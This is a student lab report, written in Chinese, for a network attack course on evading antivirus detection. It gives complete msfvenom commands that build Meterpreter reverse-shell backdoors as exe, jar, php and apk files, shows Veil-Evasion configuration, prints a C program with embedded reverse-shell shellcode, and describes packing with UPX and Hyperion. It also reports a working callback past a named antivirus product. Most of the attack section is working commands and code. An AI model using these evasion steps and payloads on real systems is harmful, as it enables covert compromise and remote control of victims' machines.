2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践

2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践

1.正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧

正确使用msf编码器

• 使用msfvenom -l encoders查看可以使用的编码器来生成不同的后门，更多的参数可以参考msfvenom一些基本用法
  

• 对实验二生成的20175216_backdoor.exe后门程序用VirusTotal进行扫描，结果如下图所示：
  

• 对实验二生成的20175216_backdoor.exe后门程序，用virscan进行扫描，扫了两次结果不一样，一次为危险，另一次为提醒（总感觉这杀软网站差点意思）扫描结果如下图所示：
  

• 使用msf编码器对后门程序进行一次到多次的编码，并进行检测。
• 一次编码：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.170.142 LPORT=5216 -f exe > zxy-encoded.exe（LHOST=Attacker's IP ，使用-p 来指定要使用的payload，使用-b选项设定了规避字符集，会自动调用编码器，使用-f 来指定payload的输出格式）

• 对生成的zxy-encoded.exe后门程序，使用VirusTotal进行扫描，扫描结果如下图所示：
  

• 十次编码：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.170.142 LPORT=5216 -f exe > zxy-encoded10.exe进行10次编码降低被查杀概率

• 对生成的zxy-encoded10.exe后门程序，使用VirusTotal进行扫描，扫描结果如下图所示：
  

msfvenom生成jar文件

• msf生成jar文件msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 x> zxy_backdoor_java.jar
  

• • 对生成的zxy_backdoor_java.jar后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
    

msfvenom生成php文件

• msf生成php文件msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.170.142 lport=5216 x> zxy_backdoor.php
  
• 对生成的zxy_backdoor.php后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
  

msfvenom生成apk文件

• msf生成apk文件msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.170.142 lport=5216 x> zxy_backdoor.apk
  
• 对生成的zxy_backdoor.apk后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
  

veil

• 1、安装过程
• 更换镜像源，更换阿里云镜像源和中科大镜像源都可以，我选择的阿里云的镜像源具体，可以参考kali linux 更换镜像源
• 安装以下软件

sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32
sudo apt-get update

• 安装veil

sudo apt-get install veil-evasion

• 选择输入s，安装时默认选择提示选项
  

• 2、使用veil生成后门文件

• 安装成功，veil 指令进入界面
  

• 可以输入指令use 1使用veil-evasion
  

• 输入指令list
  

• 输入命令use 22进入配置界面
  

• 设置端口号和IP地址

set LHOST 192.168.170.142//设置反弹连接IP
set LPORT 5216//设置端口

• 输入generate生成文件，接着输入你想要payload的名字：veil_ps_5216，文件保存路径为：/var/lib/veil/output/source/veil_ps_5216.bat
  

• 对生成的veil_ps_5216.bat后门文件，使用VirusTotal进行扫描，扫描结果如下图所示，和原来也差不多
  

• 生成一个veil_py_5216.py文件（和上述步骤一样）,使用VirusTotal进行扫描，扫描结果如下图所示，检出率比上面检测的所有文件都要低，看来不同的文件类型，检出率也不一样
  

使用C + shellcode编程

• 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 -f c生成shellcode
  

• 新建20175216.c

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xaa\x8e"
"\x68\x02\x00\x14\x60\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

• 使用mingw-w32将c语言文件生成exe文件i686-w64-mingw32-g++ 20175216.c -o 20175216.exe

• 对创建的20175216.exe后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
  

• 然后把文件放到win10运行下试试，反正觉得肯定不行，这要行的话，我都害怕
  

加壳工具

• 给之前的生成的文件进行加壳操作,压缩壳upx进行加壳，指令为upx 20175216.exe -o 20175216_upx.exe
  
• 对创建的20175216_upx.exe后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
  
• 加密壳（Hyperion）进行加壳,将加壳的文件复制到/usr/share/windows-resources/hyperion/中,输入命令wine hyperion.exe -v 20175216_upx.exe 20175216_hyperion_upx.exe
  

对创建的20175216_hyperion_upx.exe后门文件，使用VirusTotal进行扫描，扫描结果如下图所示,加壳之后检出率更高了

使用其他课堂未介绍方法

• 强制类型转换+shellcode
• 输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 -f c获取shellcode
  
• 新建zxy5216.c
  
• 使用mingw-w32将c语言文件生成exe文件i686-w64-mingw32-g++ zxy5216.c -o zxy5216.exe
  
• 对创建的zxy5216.exe后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
  

2.通过组合应用各种技术实现恶意代码免杀

• 使用工具shellcode_launcher
• 先用Msfvenom生成raw格式的shellcode msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.170.142 lport=5216 -f raw -o zxy5216.raw
  
• msfconsole开始监听
• 在shellcode_launcher-master文件打开cmd，运行指令shellcode_launcher.exe -i zxy5216.raw
  
  
  对创建的zxy5216.raw后门文件，使用VirusTotal进行扫描，扫描结果如下图所示
  
  真的没想到这个检出率真么低，用杀毒软件扫也没发生风险
  

3.用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

电脑系统windows7 6.1.7601
杀软名称：腾讯电脑管家 13.5.20525.234

实验总结

1.实验中遇到的问题

• 无法定位软件包
  
• 更换镜像源，kali自带镜像源很多都不支持，建议更换阿里云。可以参考kali linux 更换镜像源

2.基础问题回答

（1）杀软是如何检测出恶意代码的？
1、一个可执行文件中如果包含特征码，即可执行文件中有一段或多段可疑数据如shellcode之类的，杀软就认为这是恶意代码。
2、一个程序如果有特征码且有未经授权的非法动作时，杀软检测为恶意代码。
（2）免杀是做什么？
免杀能够让恶意代码躲过杀软的检测对攻击机进行非法操作，达到自己攻击目的。
（3）免杀的基本方法有哪些？
1、改变特征码，如加壳、c语言调用shellcode
2、改变行为，尽量使用反弹式连接、减少对系统的修改

3.实践总结与体会

通过这次免杀实验，我看到了杀毒软件也有局限性，有些程序有风险，杀毒软件可能只是提示有风险，让你自己来决定要不要用这个程序，这个时候最好还是慎重一些，十有八九是木马，但有的时候也不是。
做实验的时候用了很多的方法，像加壳、veil等方法，都没实现免杀，但有些放在电脑里只要不运行，杀软也没杀出来，但只要运行，要么提示有风险，要么直接就给杀掉了，人家那些杀毒软件设计者肯定也都学过这些，所以，实现免杀还是要费一番大功夫的。

4.开启杀软能绝对防止电脑中恶意代码吗？

开启杀软不能绝对防止电脑中恶意代码，但相对可以降低电脑中恶意代码的概率，目前杀毒软件已经很完善了，毕竟都是大公司设计的软件，经过了无数次的升级，对电脑的保护已经特别到位。